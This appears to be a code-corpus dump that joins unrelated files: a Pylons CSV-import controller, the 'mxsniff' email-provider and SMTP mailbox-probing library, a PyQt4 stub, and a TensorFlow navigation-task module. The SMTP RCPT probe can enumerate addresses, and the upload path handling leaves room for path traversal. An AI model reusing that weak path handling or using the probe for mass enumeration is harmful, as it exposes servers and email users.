info = DELETERELAY_MSG % dict(r=c.relayname)
audit_log(c.user.username,
4, unicode(info), request.host,
request.remote_addr, now())
flash(_('The outbound settings have been deleted'))
except:
flash(_('The outbound settings could not be deleted'))
redirect(url('org-detail', orgid=orgid))
return render('/organizations/deleterelay.html')
def import_domains(self, orgid):
"import domains from csv file"
org = self._get_org(orgid)
if not org:
abort(404)
c.form = ImportCSVForm(request.POST, csrf_context=session)
if request.POST and c.form.validate():
basedir = config['pylons.cache_dir']
csvdata = request.POST['csvfile']
if hasattr(csvdata, 'filename'):
dstfile = os.path.join(basedir, 'uploads',
csvdata.filename.lstrip(os.sep))
if not os.path.exists(dstfile) and iscsv(csvdata.file):
csvfile = open(dstfile, 'w')
shutil.copyfileobj(csvdata.file, csvfile)
csvdata.file.close()
csvfile.close()
task = importdomains.apply_async(args=[orgid,
dstfile, c.form.skipfirst.data])
if not 'taskids' in session:
session['taskids'] = []
session['taskids'].append(task.task_id)
session['dimport-counter'] = 1
session['dimport-file'] = dstfile
session.save()
flash(_('File uploaded, and is being processed, this page'
' will automatically refresh to show the status'))
redirect(url('orgs-import-status', taskid=task.task_id))
else:
filename = csvdata.filename.lstrip(os.sep)
if not iscsv(csvdata.file):
flash_alert(_('The file: %s is not a CSV file') %
filename)
else:
flash_alert(_('The file: %s already exists '
'and is being processed.') % filename)
csvdata.file.close()
else:
flash_alert(_('No CSV was file uploaded, try again'))
c.org = org
return render('/organizations/importdomains.html')
def import_status(self, taskid):
"import domains status"
result = AsyncResult(taskid)
if result is None or taskid not in session['taskids']:
flash(_('The task status requested has expired or does not exist'))
redirect(url(controller='organizations', action='index'))
if result.ready():
finished = True
flash.pop_messages()
if isinstance(result.result, Exception):
if c.user.is_superadmin:
flash_alert(_('Error occured in processing %s') %
result.result)
else:
flash_alert(_('Backend error occured during processing.'))
redirect(url(controller='organizations'))
update_serial.delay()
info = IMPORTORG_MSG % dict(o='-')
audit_log(c.user.username,
3, unicode(info), request.host,
request.remote_addr, now())
else:
session['dimport-counter'] += 1
session.save()
if (session['dimport-counter'] >= 10 and
result.state in ['PENDING', 'RETRY', 'FAILURE']):
result.revoke()
try:
os.unlink(session['dimport-file'])
except OSError:
pass
del session['dimport-file']
del session['dimport-counter']
session.save()
flash_alert(_('The import could not be processed,'
' try again later'))
redirect(url(controller='organizations'))
finished = False
c.finished = finished
c.results = result.result
c.success = result.successful()
return render('/organizations/importstatus.html')
def setnum(self, format=None):
"Set num of organizations returned"
num = check_num_param(request)
if num and num in [10, 20, 50, 100]:
session['organizations_num_items'] = num
session.save()
nextpage = request.headers.get('Referer', '/')
if '://' in nextpage:
from_url = urlparse(nextpage)
nextpage = from_url[2]
redirect(nextpage)
| gpl-3.0 | -7,609,831,463,490,971,000 | 39.025057 | 79 | 0.544818 | false |
jace/mxsniff | mxsniff/__init__.py | 1 | 19707 | # -*- coding: utf-8 -*-
"""
MX Sniff identifies common email service providers from an address or domain.
"""
from __future__ import absolute_import, print_function
from six import string_types, text_type
from six.moves.urllib.parse import urlparse
from collections import namedtuple
from email.utils import parseaddr
from functools import partial
import smtplib
import socket
import sys
from pyisemail import is_email
from tldextract import TLDExtract
import dns.resolver
from ._version import __version__, __version_info__ # NOQA: F401
from .providers import providers as all_providers
from .providers import public_domains
__all__ = ['MXLookupException', 'get_domain', 'mxsniff', 'mxbulksniff']
_value = object() # Used in WildcardDomainDict as a placeholder
tldextract = TLDExtract(suffix_list_urls=None) # Don't fetch TLDs during a sniff
ResultCodeMessage = namedtuple('ResultCodeMessage', ['result', 'code', 'message'])
class WildcardDomainDict(object):
"""
Like a dict, but with custom __getitem__ and __setitem__ to make a nested dictionary
with wildcard support for domain name mappings.
>>> d = WildcardDomainDict()
>>> d
WildcardDomainDict({})
>>> d['*.example.com'] = 'example-wildcard'
>>> d['*.wildcard.example.com.'] = 'example-subdotted'
>>> d['example.com'] = 'example'
>>> d['www.example.com'] = 'example-www'
>>> d['example.com']
'example'
>>> d['www.example.com']
'example-www'
>>> d['wildcard.example.com']
'example-wildcard'
>>> d['sub.wildcard.example.com']
'example-subdotted'
>>> d['example.wildcard.com']
Traceback (most recent call last):
...
KeyError: 'example.wildcard.com'
"""
def __init__(self, *args, **kwargs):
self.tree = dict(*args, **kwargs)
def __repr__(self):
return self.__class__.__name__ + '(' + repr(self.tree) + ')'
@staticmethod
def _makeparts(key):
parts = key.lower().split('.')
while '' in parts:
parts.remove('') # Handle trailing dot
return parts[::-1]
def __setitem__(self, key, value):
parts = self._makeparts(key)
tree = self.tree
for item in parts:
if item not in tree:
tree[item] = {}
tree = tree[item]
tree[_value] = value
def __getitem__(self, key):
parts = self._makeparts(key)
length = len(parts)
tree = self.tree
for counter, item in enumerate(parts):
last = counter == length - 1
if item in tree and (not last or last and _value in tree[item]):
tree = tree[item]
elif '*' in tree:
tree = tree['*']
else:
raise KeyError(key)
if _value in tree:
return tree[_value]
raise KeyError(key)
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return default
provider_mx = WildcardDomainDict()
provider_domains = {}
def __populate_dicts(pmx, pd):
for name, data in all_providers.items():
for domain in data['mx']:
pmx[domain] = name
if 'domains' in data:
for domain in data['domains']:
pd[domain] = name
__populate_dicts(provider_mx, provider_domains)
class MXLookupException(Exception):
pass
def canonical_email(
email, lowercase=False, strip_periods=False, substitute_domains=None
):
"""
Return a canonical representation of an email address to facilitate string
comparison::
>>> canonical_email('Example <[email protected]>')
'[email protected]'
>>> canonical_email('[email protected]', lowercase=True, strip_periods=True)
'[email protected]'
"""
if substitute_domains is None:
substitute_domains = {}
# Example <[email protected]> --> [email protected]
addr = parseaddr(email)[1]
if not is_email(addr):
return
# [email protected] --> example+extra, Example.com
mailbox, domain = addr.split('@', 1)
# example+extra --> example
if '+' in mailbox:
mailbox = mailbox[: mailbox.find('+')]
if strip_periods and '.' in mailbox:
mailbox = mailbox.replace('.', '')
if lowercase:
mailbox = mailbox.lower()
# Example.com --> example.com
domain = domain.lower()
# googlemail.com --> gmail.com
if domain in substitute_domains:
domain = substitute_domains[domain]
# example, example.com --> [email protected]
return '%s@%s' % (mailbox, domain)
def get_domain(email_or_domain):
"""
Extract domain name from an email address, URL or (raw) domain name.
>>> get_domain('[email protected]')
'example.com'
>>> get_domain('http://www.example.com')
'example.com'
>>> get_domain('example.com')
'example.com'
"""
if '@' in email_or_domain:
# Appears to be an email address.
addr = parseaddr(email_or_domain)[1]
domain = addr.split('@', 1)[-1]
elif '//' in email_or_domain:
domain = tldextract(
urlparse(email_or_domain).netloc.split(':')[0]
).registered_domain
else:
domain = email_or_domain.strip()
return domain.lower()
def provider_info(provider):
"""
Return a copy of the provider dict with only public fields
"""
if provider in all_providers:
return {
'name': provider,
'title': all_providers[provider].get('title'),
'note': all_providers[provider].get('note'),
'url': all_providers[provider].get('url'),
'public': all_providers[provider].get('public', False),
}
def mxsniff(
email_or_domain,
ignore_errors=False,
cache=None,
timeout=30,
use_static_domains=True,
):
"""
Lookup MX records and identify the email service provider(s).
Accepts an email address, URL or domain name, and looks up an internal list of
well known providers.
:param str email_or_domain: Email, domain or URL to lookup
:param bool ignore_errors: Fail silently if there's a DNS lookup error
:param dict cache: Cache with a dictionary interface to avoid redundant lookups
:param int timeout: Timeout in seconds
:param bool use_static_domains: Speed up lookups by using the static domain list in
the provider database
:return: Matching domain, MX servers, and identified service provider(s)
:raises MXLookupException: If a DNS lookup error happens and ``ignore_errors`` is
False
>>> mxsniff('example.com')['match']
['nomx']
>>> mxsniff('__invalid_domain_name__.com')['match']
['nomx']
>>> mxsniff('[email protected]')['match']
['google-gmail']
>>> sorted(mxsniff('https://google.com/').keys())
['canonical', 'domain', 'match', 'mx', 'providers', 'public', 'query']
"""
domain = get_domain(email_or_domain)
if cache is not None and domain in cache:
result = dict(cache[domain])
result['query'] = email_or_domain
return result
#: Providers that matched
matches = []
#: Info on matching providers (title, note, url, public)
rproviders = []
#: Top-level of MX domain (used to detect self-hosted email)
tld = []
#: Default return value for MX in case an error occurs and is ignored
mx_answers = []
if use_static_domains and domain in provider_domains:
matches.append(provider_domains[domain])
rproviders.append(provider_info(provider_domains[domain]))
else:
try:
# Use a DNS resolver with custom timeout
resolver = dns.resolver.Resolver()
resolver.timeout = timeout
resolver.lifetime = timeout
# Get answers, sorted by MX preference
mx_answers = sorted(
(rdata.preference, rdata.exchange.to_text(omit_final_dot=True).lower())
for rdata in resolver.query(domain, 'MX')
)
for _preference, exchange in mx_answers:
# Extract the top-level domain for testing for self-hosted email later
rdomain = tldextract(exchange).registered_domain
if rdomain not in tld:
tld.append(rdomain)
# Check if the provider is known from the MX record
provider = provider_mx.get(exchange)
if provider and provider not in matches:
matches.append(provider)
rproviders.append(provider_info(provider))
except (
dns.resolver.NoAnswer,
dns.resolver.NXDOMAIN,
dns.resolver.NoNameservers,
):
pass
except dns.exception.DNSException as e:
if ignore_errors:
pass
else:
raise MXLookupException(e, domain)
if not matches:
# Check for self-hosted email servers; identify them with the label 'self'
if tldextract(domain).registered_domain in tld:
matches.append('self')
if not matches:
if mx_answers:
matches.append('unknown') # We don't know this one's provider
else:
matches.append('nomx') # This domain has no mail servers
if matches:
canonical = canonical_email(
email_or_domain,
**all_providers.get(matches[0], {}).get('canonical_flags', {})
)
else:
canonical = canonical_email(email_or_domain)
result = {
'query': email_or_domain,
'domain': domain,
'match': matches,
'mx': mx_answers,
'providers': rproviders,
'public': domain in public_domains or any(p['public'] for p in rproviders),
'canonical': canonical,
}
if cache is not None:
cache[domain] = result
return result
def mxprobe(email, mx, your_email, hostname=None, timeout=30):
"""
Probe an email address at an MX server
:param str email: Email address to be probed
:param mx: MX server(s) to do the test at; will be tried in order until one is
available
:param your_email: Your email address, to perform the probe
:param hostname: Optional hostname to perform the probe with
:return: :attr:`ResultCodeMessage`, a 3-tuple of result, SMTP code and explanatory
message
Possible results:
* invalid: This is not an email address
* error: The MX servers could not be probed
* fail: The email address doesn't appear to exist, but further investigation is
necessary
* soft-fail: The email address is currently not accepting email
* hard-fail: The email address does not exist
* pass: The email address appears to exist
* pass-unverified: Mail server is accepting email but can't verify existence
>>> mxprobe('[email protected]', 'gmail-smtp-in.l.google.com', '[email protected]')[0]
'pass'
>>> mxprobe('[email protected]', 'gmail-smtp-in.l.google.com', '[email protected]')[0]
'hard-fail'
>>> mxprobe('[email protected]', [], '[email protected]', timeout=5)[0]
'error'
>>> mxprobe('example.com', [], '[email protected]').result
'invalid'
"""
if not hostname:
hostname = 'probe.' + your_email.split('@', 1)[-1].strip()
email = parseaddr(email)[1]
if not is_email(email):
return ResultCodeMessage('invalid', None, None)
if not mx:
mx = [email.split('@', 1)[-1].strip()]
if isinstance(mx, string_types):
mx = [mx]
error_code = None
error_msg = None
for mxserver in mx:
probe_result = None
try:
smtp = smtplib.SMTP(mxserver, 25, hostname, timeout)
smtp.ehlo_or_helo_if_needed()
code, msg = smtp.mail(your_email)
msg = text_type(msg, 'utf-8')
if code != 250:
error_code = code
error_msg = msg
continue
# Supply the email address as a recipient and see how the server responds
code, msg = smtp.rcpt(email)
msg = text_type(msg, 'utf-8')
# List of codes from
# http://support.mailhostbox.com/email-administrators-guide-error-codes/
# 250 – Requested mail action completed and OK
if code == 250:
probe_result = ResultCodeMessage('pass', code, msg)
# 251 – Not Local User, forward email to forward path
# 252 – Cannot Verify user, will attempt delivery later
# 253 – Pending messages for node started
elif code in (251, 252, 253):
probe_result = ResultCodeMessage('pass-unverified', code, msg)
elif code in (
450, # Requested mail action not taken: mailbox unavailable. Request
# refused
451, # Requested action aborted: local error in processing. Request is
# unable to be processed, try again
452, # Requested action not taken: insufficient system storage
510, # Check the recipient address
512, # Domain can not be found. Unknown host.
515, # Destination mailbox address invalid
521, # Domain does not accept mail
522, # Recipient has exceeded mailbox limit
531, # Mail system Full
533, # Remote server has insufficient disk space to hold email
540, # Email address has no DNS Server
550, # Requested action not taken: mailbox unavailable
551, # User not local; please try forward path
552, # Requested mail action aborted: exceeded storage allocation
553, # Requested action not taken: mailbox name not allowed
):
# Some servers return ESMTP codes prefixed with #, others don't
if msg.startswith(('4.', '#4.')):
r = 'soft-fail'
elif msg.startswith(('5.', '#5.')):
r = 'hard-fail'
else:
r = 'fail'
probe_result = ResultCodeMessage(r, code, msg)
else: # Unknown code
error_code = code
error_msg = msg
except smtplib.SMTPResponseException as e:
error_code = e.smtp_code
error_msg = e.smtp_error
except (smtplib.SMTPException, socket.error) as e:
error_code = None
error_msg = text_type(e)
continue
# Probe complete. Quit the connection, ignoring errors
try:
smtp.rset()
smtp.quit()
except smtplib.SMTPException: # pragma: no cover
pass
# Did we get a result? Return it
if probe_result is not None:
return probe_result
# If no result, continue to the next MX server
# We couldn't talk to any MX server
return ResultCodeMessage('error', error_code, error_msg)
def mxbulksniff(items, ignore_errors=True):
"""
Identify the email service provider of a large set of domains or emails, caching to
avoid repeat queries. Returns a generator that yields one item at a time
>>> [(i['query'], i['match']) for i in mxbulksniff(
... ['example.com', 'google.com', 'http://www.google.com', 'example.com'])]
[('example.com', ['nomx']), ('google.com', ['google-apps']), ('http://www.google.com', ['google-apps']), ('example.com', ['nomx'])]
"""
cache = {}
for i in items:
yield mxsniff(i, ignore_errors, cache)
def mxsniff_and_probe(email, probe_email, timeout=30, **kwargs):
"""
Combine :func:`mxsniff` and :func:`mxprobe` into a single result
"""
result = mxsniff(email, timeout=timeout, **kwargs)
if probe_email:
result['probe'] = mxprobe(
email, [mx[1] for mx in result['mx']], probe_email, timeout=timeout
)
return result
def main_internal(args, name='mxsniff'):
"""
Console script
>>> main_internal(['[email protected]']) # doctest: +ELLIPSIS
[email protected],google-gmail...
>>> main_internal(['[email protected]', '-p', '[email protected]']) # doctest: +ELLIPSIS
[email protected],hard-fail,...
>>> main_internal(['example.com', '-v'])
[
{"canonical": null, "domain": "example.com", "match": ["nomx"], "mx": [], "providers": [], "public": false, "query": "example.com"}
]
>>> main_internal(['Example <[email protected]>', '-v']) # doctest: +ELLIPSIS
[
{"canonical": "[email protected]", "domain": "googlemail.com", "match": ["google-gmail"], "mx": [...], "providers": [...], "public": true, "query": "Example <[email protected]>"}
]
"""
import argparse
import json
from multiprocessing.dummy import Pool
try: # pragma: no cover
import unicodecsv as csv
except ImportError:
import csv
parser = argparse.ArgumentParser(
prog=name,
description="Identify email service providers given an email address, URL or"
" domain name",
fromfile_prefix_chars='@',
)
parser.add_argument(
'names',
metavar='email_or_url',
nargs='+',
help="email or URL to look up; use @filename to load from a file",
)
parser.add_argument(
'-v', '--verbose', action='store_true', help="return verbose results in JSON"
)
parser.add_argument(
'-i',
'--ignore-errors',
action='store_true',
help="ignore DNS lookup errors and continue with next item",
)
parser.add_argument(
'-t',
'--timeout',
type=int,
metavar='T',
default=30,
help="DNS timeout in seconds (default: %(default)s)",
)
parser.add_argument(
'-p',
'--probe',
metavar='your_email',
default=None,
help="probe whether target email address exists (needs your email to perform"
" the test)",
)
args = parser.parse_args(args)
# Assume non-Unicode names to be in UTF-8
names = [
n.decode('utf-8') if not isinstance(n, text_type) else n for n in args.names
]
pool = Pool(processes=10 if not args.probe else 1)
it = pool.imap_unordered(
partial(
mxsniff_and_probe,
probe_email=args.probe,
ignore_errors=args.ignore_errors,
timeout=args.timeout,
use_static_domains=False,
),
names,
10,
)
try:
if args.verbose:
# Valid JSON output hack
firstline = True
print('[') # NOQA: T001
for result in it:
if firstline:
firstline = False
else:
print(',') # NOQA: T001
print(json.dumps(result, sort_keys=True), end='') # NOQA: T001
print('\n]') # NOQA: T001
else:
out = csv.writer(sys.stdout)
for result in it:
if args.probe:
out.writerow([result['query']] + list(result['probe']))
else:
out.writerow([result['query']] + result['match'])
except KeyboardInterrupt: # pragma: no cover
pool.terminate()
raise
def main(): # pragma: no cover
import os.path
return main_internal(sys.argv[1:], os.path.basename(sys.argv[0]))
if __name__ == '__main__':
sys.exit(main())
| bsd-2-clause | -7,346,651,478,814,154,000 | 33.499124 | 194 | 0.581095 | false |
ProfessorX/Config | .PyCharm30/system/python_stubs/-1247972723/PyQt4/QtNetwork/__init__/QHttpHeader.py | 2 | 4106 | # encoding: utf-8
# module PyQt4.QtNetwork
# from /usr/lib/python2.7/dist-packages/PyQt4/QtNetwork.so
# by generator 1.135
# no doc
# imports
import PyQt4.QtCore as __PyQt4_QtCore
class QHttpHeader(): # skipped bases: <type 'sip.simplewrapper'>
"""
QHttpHeader()
QHttpHeader(QHttpHeader)
QHttpHeader(QString)
"""
def addValue(self, QString, QString_1): # real signature unknown; restored from __doc__
""" QHttpHeader.addValue(QString, QString) """
pass
def allValues(self, QString): # real signature unknown; restored from __doc__
""" QHttpHeader.allValues(QString) -> QStringList """
pass
def contentLength(self): # real signature unknown; restored from __doc__
""" QHttpHeader.contentLength() -> int """
return 0
def contentType(self): # real signature unknown; restored from __doc__
""" QHttpHeader.contentType() -> QString """
pass
def hasContentLength(self): # real signature unknown; restored from __doc__
""" QHttpHeader.hasContentLength() -> bool """
return False
def hasContentType(self): # real signature unknown; restored from __doc__
""" QHttpHeader.hasContentType() -> bool """
return False
def hasKey(self, QString): # real signature unknown; restored from __doc__
""" QHttpHeader.hasKey(QString) -> bool """
return False
def isValid(self): # real signature unknown; restored from __doc__
""" QHttpHeader.isValid() -> bool """
return False
def keys(self): # real signature unknown; restored from __doc__
""" QHttpHeader.keys() -> QStringList """
pass
def majorVersion(self): # real signature unknown; restored from __doc__
""" QHttpHeader.majorVersion() -> int """
return 0
def minorVersion(self): # real signature unknown; restored from __doc__
""" QHttpHeader.minorVersion() -> int """
return 0
def parse(self, QString): # real signature unknown; restored from __doc__
""" QHttpHeader.parse(QString) -> bool """
return False
def parseLine(self, QString, p_int): # real signature unknown; restored from __doc__
""" QHttpHeader.parseLine(QString, int) -> bool """
return False
def removeAllValues(self, QString): # real signature unknown; restored from __doc__
""" QHttpHeader.removeAllValues(QString) """
pass
def removeValue(self, QString): # real signature unknown; restored from __doc__
""" QHttpHeader.removeValue(QString) """
pass
def setContentLength(self, p_int): # real signature unknown; restored from __doc__
""" QHttpHeader.setContentLength(int) """
pass
def setContentType(self, QString): # real signature unknown; restored from __doc__
""" QHttpHeader.setContentType(QString) """
pass
def setValid(self, bool): # real signature unknown; restored from __doc__
""" QHttpHeader.setValid(bool) """
pass
def setValue(self, QString, QString_1): # real signature unknown; restored from __doc__
""" QHttpHeader.setValue(QString, QString) """
pass
def setValues(self, list_of_tuple_of_QString_QString): # real signature unknown; restored from __doc__
""" QHttpHeader.setValues(list-of-tuple-of-QString-QString) """
pass
def toString(self): # real signature unknown; restored from __doc__
""" QHttpHeader.toString() -> QString """
pass
def value(self, QString): # real signature unknown; restored from __doc__
""" QHttpHeader.value(QString) -> QString """
pass
def values(self): # real signature unknown; restored from __doc__
""" QHttpHeader.values() -> list-of-tuple-of-QString-QString """
pass
def __init__(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads
pass
__weakref__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""list of weak references to the object (if defined)"""
| gpl-2.0 | -6,210,554,165,270,295,000 | 34.396552 | 106 | 0.628105 | false |
cshallue/models | research/cognitive_planning/tasks.py | 5 | 59475 | # Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A library of tasks.
This interface is intended to implement a wide variety of navigation
tasks. See go/navigation_tasks for a list.
"""
import abc
import collections
import math
import threading
import networkx as nx
import numpy as np
import tensorflow as tf
#from pyglib import logging
#import gin
from envs import task_env
from envs import util as envs_util
# Utility functions.
def _pad_or_clip_array(np_arr, arr_len, is_front_clip=True, output_mask=False):
"""Make np_arr array to have length arr_len.
If the array is shorter than arr_len, then it is padded from the front with
zeros. If it is longer, then it is clipped either from the back or from the
front. Only the first dimension is modified.
Args:
np_arr: numpy array.
arr_len: integer scalar.
is_front_clip: a boolean. If true then clipping is done in the front,
otherwise in the back.
output_mask: If True, outputs a numpy array of rank 1 which represents
a mask of which values have been added (0 - added, 1 - actual output).
Returns:
A numpy array and the size of padding (as a python int32). This size is
negative is the array is clipped.
"""
shape = list(np_arr.shape)
pad_size = arr_len - shape[0]
padded_or_clipped = None
if pad_size < 0:
if is_front_clip:
padded_or_clipped = np_arr[-pad_size:, :]
else:
padded_or_clipped = np_arr[:arr_len, :]
elif pad_size > 0:
padding = np.zeros([pad_size] + shape[1:], dtype=np_arr.dtype)
padded_or_clipped = np.concatenate([np_arr, padding], axis=0)
else:
padded_or_clipped = np_arr
if output_mask:
mask = np.ones((arr_len,), dtype=np.int)
if pad_size > 0:
mask[-pad_size:] = 0
return padded_or_clipped, pad_size, mask
else:
return padded_or_clipped, pad_size
def classification_loss(truth, predicted, weights=None, is_one_hot=True):
"""A cross entropy loss.
Computes the mean of cross entropy losses for all pairs of true labels and
predictions. It wraps around a tf implementation of the cross entropy loss
with additional reformating of the inputs. If the truth and predicted are
n-rank Tensors with n > 2, then these are reshaped to 2-rank Tensors. It
allows for truth to be specified as one hot vector or class indices. Finally,
a weight can be specified for each element in truth and predicted.
Args:
truth: an n-rank or (n-1)-rank Tensor containing labels. If is_one_hot is
True, then n-rank Tensor is expected, otherwise (n-1) rank one.
predicted: an n-rank float Tensor containing prediction probabilities.
weights: an (n-1)-rank float Tensor of weights
is_one_hot: a boolean.
Returns:
A TF float scalar.
"""
num_labels = predicted.get_shape().as_list()[-1]
if not is_one_hot:
truth = tf.reshape(truth, [-1])
truth = tf.one_hot(
truth, depth=num_labels, on_value=1.0, off_value=0.0, axis=-1)
else:
truth = tf.reshape(truth, [-1, num_labels])
predicted = tf.reshape(predicted, [-1, num_labels])
losses = tf.nn.softmax_cross_entropy_with_logits(
labels=truth, logits=predicted)
if weights is not None:
losses = tf.boolean_mask(losses,
tf.cast(tf.reshape(weights, [-1]), dtype=tf.bool))
return tf.reduce_mean(losses)
class UnrolledTaskIOConfig(object):
"""Configuration of task inputs and outputs.
A task can have multiple inputs, which define the context, and a task query
which defines what is to be executed in this context. The desired execution
is encoded in an output. The config defines the shapes of the inputs, the
query and the outputs.
"""
def __init__(self, inputs, output, query=None):
"""Constructs a Task input/output config.
Args:
inputs: a list of tuples. Each tuple represents the configuration of an
input, with first element being the type (a string value) and the second
element the shape.
output: a tuple representing the configuration of the output.
query: a tuple representing the configuration of the query. If no query,
then None.
"""
# A configuration of a single input, output or query. Consists of the type,
# which can be one of the three specified above, and a shape. The shape must
# be consistent with the type, e.g. if type == 'image', then shape is a 3
# valued list.
io_config = collections.namedtuple('IOConfig', ['type', 'shape'])
def assert_config(config):
if not isinstance(config, tuple):
raise ValueError('config must be a tuple. Received {}'.format(
type(config)))
if len(config) != 2:
raise ValueError('config must have 2 elements, has %d' % len(config))
if not isinstance(config[0], tf.DType):
raise ValueError('First element of config must be a tf.DType.')
if not isinstance(config[1], list):
raise ValueError('Second element of config must be a list.')
assert isinstance(inputs, collections.OrderedDict)
for modality_type in inputs:
assert_config(inputs[modality_type])
self._inputs = collections.OrderedDict(
[(k, io_config(*value)) for k, value in inputs.iteritems()])
if query is not None:
assert_config(query)
self._query = io_config(*query)
else:
self._query = None
assert_config(output)
self._output = io_config(*output)
@property
def inputs(self):
return self._inputs
@property
def output(self):
return self._output
@property
def query(self):
return self._query
class UnrolledTask(object):
"""An interface for a Task which can be unrolled during training.
Each example is called episode and consists of inputs and target output, where
the output can be considered as desired unrolled sequence of actions for the
inputs. For the specified tasks, these action sequences are to be
unambiguously definable.
"""
__metaclass__ = abc.ABCMeta
def __init__(self, config):
assert isinstance(config, UnrolledTaskIOConfig)
self._config = config
# A dict of bookkeeping variables.
self.info = {}
# Tensorflow input is multithreaded and this lock is needed to prevent
# race condition in the environment. Without the lock, non-thread safe
# environments crash.
self._lock = threading.Lock()
@property
def config(self):
return self._config
@abc.abstractmethod
def episode(self):
"""Returns data needed to train and test a single episode.
Each episode consists of inputs, which define the context of the task, a
query which defines the task, and a target output, which defines a
sequence of actions to be executed for this query. This sequence should not
require feedback, i.e. can be predicted purely from input and query.]
Returns:
inputs, query, output, where inputs is a list of numpy arrays and query
and output are numpy arrays. These arrays must be of shape and type as
specified in the task configuration.
"""
pass
def reset(self, observation):
"""Called after the environment is reset."""
pass
def episode_batch(self, batch_size):
"""Returns a batch of episodes.
Args:
batch_size: size of batch.
Returns:
(inputs, query, output, masks) where inputs is list of numpy arrays and
query, output, and mask are numpy arrays. These arrays must be of shape
and type as specified in the task configuration with one additional
preceding dimension corresponding to the batch.
Raises:
ValueError: if self.episode() returns illegal values.
"""
batched_inputs = collections.OrderedDict(
[[mtype, []] for mtype in self.config.inputs])
batched_queries = []
batched_outputs = []
batched_masks = []
for _ in range(int(batch_size)):
with self._lock:
# The episode function needs to be thread-safe. Since the current
# implementation for the envs are not thread safe we need to have lock
# the operations here.
inputs, query, outputs = self.episode()
if not isinstance(outputs, tuple):
raise ValueError('Outputs return value must be tuple.')
if len(outputs) != 2:
raise ValueError('Output tuple must be of size 2.')
if inputs is not None:
for modality_type in batched_inputs:
batched_inputs[modality_type].append(
np.expand_dims(inputs[modality_type], axis=0))
if query is not None:
batched_queries.append(np.expand_dims(query, axis=0))
batched_outputs.append(np.expand_dims(outputs[0], axis=0))
if outputs[1] is not None:
batched_masks.append(np.expand_dims(outputs[1], axis=0))
batched_inputs = {
k: np.concatenate(i, axis=0) for k, i in batched_inputs.iteritems()
}
if batched_queries:
batched_queries = np.concatenate(batched_queries, axis=0)
batched_outputs = np.concatenate(batched_outputs, axis=0)
if batched_masks:
batched_masks = np.concatenate(batched_masks, axis=0).astype(np.float32)
else:
# When the array is empty, the default np.dtype is float64 which causes
# py_func to crash in the tests.
batched_masks = np.array([], dtype=np.float32)
batched_inputs = [batched_inputs[k] for k in self._config.inputs]
return batched_inputs, batched_queries, batched_outputs, batched_masks
def tf_episode_batch(self, batch_size):
"""A batch of episodes as TF Tensors.
Same as episode_batch with the difference that the return values are TF
Tensors.
Args:
batch_size: a python float for the batch size.
Returns:
inputs, query, output, mask where inputs is a dictionary of tf.Tensor
where the keys are the modality types specified in the config.inputs.
query, output, and mask are TF Tensors. These tensors must
be of shape and type as specified in the task configuration with one
additional preceding dimension corresponding to the batch. Both mask and
output have the same shape as output.
"""
# Define TF outputs.
touts = []
shapes = []
for _, i in self._config.inputs.iteritems():
touts.append(i.type)
shapes.append(i.shape)
if self._config.query is not None:
touts.append(self._config.query.type)
shapes.append(self._config.query.shape)
# Shapes and types for batched_outputs.
touts.append(self._config.output.type)
shapes.append(self._config.output.shape)
# Shapes and types for batched_masks.
touts.append(self._config.output.type)
shapes.append(self._config.output.shape[0:1])
def episode_batch_func():
if self.config.query is None:
inp, _, output, masks = self.episode_batch(int(batch_size))
return tuple(inp) + (output, masks)
else:
inp, query, output, masks = self.episode_batch(int(batch_size))
return tuple(inp) + (query, output, masks)
tf_episode_batch = tf.py_func(episode_batch_func, [], touts,
stateful=True, name='taskdata')
for episode, shape in zip(tf_episode_batch, shapes):
episode.set_shape([batch_size] + shape)
tf_episode_batch_dict = collections.OrderedDict([
(mtype, episode)
for mtype, episode in zip(self.config.inputs.keys(), tf_episode_batch)
])
cur_index = len(self.config.inputs.keys())
tf_query = None
if self.config.query is not None:
tf_query = tf_episode_batch[cur_index]
cur_index += 1
tf_outputs = tf_episode_batch[cur_index]
tf_masks = tf_episode_batch[cur_index + 1]
return tf_episode_batch_dict, tf_query, tf_outputs, tf_masks
@abc.abstractmethod
def target_loss(self, true_targets, targets, weights=None):
"""A loss for training a task model.
This loss measures the discrepancy between the task outputs, the true and
predicted ones.
Args:
true_targets: tf.Tensor of shape and type as defined in the task config
containing the true outputs.
targets: tf.Tensor of shape and type as defined in the task config
containing the predicted outputs.
weights: a bool tf.Tensor of shape as targets. Only true values are
considered when formulating the loss.
"""
pass
def reward(self, obs, done, info):
"""Returns a reward.
The tasks has to compute a reward based on the state of the environment. The
reward computation, though, is task specific. The task is to use the
environment interface, as defined in task_env.py, to compute the reward. If
this interface does not expose enough information, it is to be updated.
Args:
obs: Observation from environment's step function.
done: Done flag from environment's step function.
info: Info dict from environment's step function.
Returns:
obs: Observation.
reward: Floating point value.
done: Done flag.
info: Info dict.
"""
# Default implementation does not do anything.
return obs, 0.0, done, info
class RandomExplorationBasedTask(UnrolledTask):
"""A Task which starts with a random exploration of the environment."""
def __init__(self,
env,
seed,
add_query_noise=False,
query_noise_var=0.0,
*args,
**kwargs): # pylint: disable=keyword-arg-before-vararg
"""Initializes a Task using a random exploration runs.
Args:
env: an instance of type TaskEnv and gym.Env.
seed: a random seed.
add_query_noise: boolean, if True then whatever queries are generated,
they are randomly perturbed. The semantics of the queries depends on the
concrete task implementation.
query_noise_var: float, the variance of Gaussian noise used for query
perturbation. Used iff add_query_noise==True.
*args: see super class.
**kwargs: see super class.
"""
super(RandomExplorationBasedTask, self).__init__(*args, **kwargs)
assert isinstance(env, task_env.TaskEnv)
self._env = env
self._env.set_task(self)
self._rng = np.random.RandomState(seed)
self._add_query_noise = add_query_noise
self._query_noise_var = query_noise_var
# GoToStaticXTask can also take empty config but for the rest of the classes
# the number of modality types is 1.
if len(self.config.inputs.keys()) > 1:
raise NotImplementedError('current implementation supports input '
'with only one modality type or less.')
def _exploration(self):
"""Generates a random exploration run.
The function uses the environment to generate a run.
Returns:
A tuple of numpy arrays. The i-th array contains observation of type and
shape as specified in config.inputs[i].
A list of states along the exploration path.
